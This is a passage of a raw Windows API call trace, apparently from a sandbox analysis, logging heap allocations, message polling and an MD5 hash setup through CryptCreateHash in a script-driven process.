[0259.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.380] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.380] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.380] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.380] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.380] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0259.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.380] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0259.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.380] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.381] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.381] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.381] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.381] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.381] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.381] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0259.381] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.382] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0259.382] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.382] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.384] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.384] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.384] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.384] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.385] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.385] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.385] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51da8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0259.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.385] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0259.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0259.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.386] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0259.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0259.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0259.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0259.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0259.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550d8 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55108, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0259.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0259.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.391] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0259.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0259.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.393] HeapFree (in: hHeap=0x970000, 